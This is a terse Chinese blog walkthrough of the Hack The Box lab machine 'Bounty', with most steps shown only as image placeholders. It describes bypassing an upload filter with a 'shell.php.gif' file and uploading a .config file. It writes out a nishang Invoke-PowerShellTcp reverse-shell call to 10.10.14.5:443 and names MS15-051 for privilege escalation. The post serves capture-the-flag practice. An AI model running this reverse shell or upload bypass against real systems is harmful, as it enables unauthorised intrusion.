当前位置: 代码迷 >> 综合 >> Hack the box靶机 Bounty
  详细解决方案

Hack the box靶机 Bounty

热度:80   发布时间:2023-12-03 13:01:43.0

在这里插入图片描述在这里插入图片描述在这里插入图片描述

两个页面都是没有权限不能访问
但是也没有扫出来登录页面

在这里插入图片描述

投个图
他们换了本字典
我懒得扫了

在这里插入图片描述在这里插入图片描述

有过滤
上传了一个shell.php.gif绕过了
找到一篇博客
上传.config

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述

使用nishang的Invoke-PowerShellTcp.ps1的时候
需要在这个文件末尾加入调用
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
然后就可以连接了

在这里插入图片描述

没有补丁
那ms15-051

在这里插入图片描述
在这里插入图片描述

完成